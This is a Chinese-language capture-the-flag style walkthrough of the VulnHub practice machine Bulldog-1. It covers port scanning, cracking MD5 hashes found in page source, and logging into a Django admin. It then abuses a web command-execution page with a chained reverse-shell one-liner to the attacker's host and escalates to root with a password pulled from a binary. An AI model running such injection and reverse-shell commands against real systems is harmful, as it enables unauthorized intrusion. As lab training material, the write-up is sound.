vulnhub靶场，bulldog1

vulnhub靶场，bulldog1

环境准备

靶机下载地址：https://www.vulnhub.com/entry/bulldog-1,211/
攻击机：kali（192.168.109.128）
靶机：bulldog1（192.168.109.157）
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.157
使用nmap扫描查看目标靶机端口开放情况

开放端口：23、80、8080
可以开到目标靶机将ssh端口换成了23
浏览器访问目标靶机80端口

翻译其中内容是说此网站已经被黑了，查看源代码也没有发现什么
点击Public Notice跳转到了另一个页面

查看源代码也没有发现什么
网站指纹识别

使用dirb进行网站目录结构扫描

先只观察一下一级目录，访问/admin网页

看来是Django的后台管理登录页面，使用暴力破解和SQL注入均无效
访问/dev网页

中间有个web-shell，点击试试

看来必须要登入后台才能进入这个页面，回到上个页面，翻译一下

这里说不确定黑客有没有留下什么痕迹，可能是在提醒我们，看看源代码里面有没有什么东西

果然在源代码里发现了一些加密后的数据，猜测使用了md5进行加密

渗透过程

将这个md5加密后的密文放到解密网站依次进行猜解







成功破解出两个密码，再根据源码前面的对应关系得到两个账号密码，分别是：nick:bulldog，sarah:bulldoglover
再次找到后台登录的地方，使用这两个账号试试能不能登录

可以看到nick用户成功登入后台
再次回到那个webshell的位置

看来这里应该是一个命令执行的位置，输出上面给的命令试试

确实是这样，那可以试着加管道符运行我们想运行的命令

可以看到，运行成功了，那现在就可以反弹shell了
kali终端：

靶机中：

ls&echo "bash -i >& /dev/tcp/192.168.109.128/4444 0>&1" | bash

可以看到kali这边成功反弹回来了一个shell

提权过程

查看用户的sudo权限

没有sudo权限，进入家目录

发现一个bulldogadmin文件，进去看看

又发现一个.hiddenadmindirectory文件
再进去看看

又发现了一个customPermissionApp文件，查看其内容

发现一堆乱码，用strings命令用来提取和显示非文本文件中的文本字符串

猜测可能是密码，应为SUPER、 ulitimate、PASSWORD、youCANTget， 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget，H是来混淆的，中间刚好有PADDWORD
使用su命令切换为root用户

这里发现不能使用su命令，这里报的错误是必须要从终端运行，那使用python打开一个新的终端，使用sudo -i命令试试

可以看到成功切换为root用户，查看当前文件夹，成功获得flag，靶机bulldog1渗透结束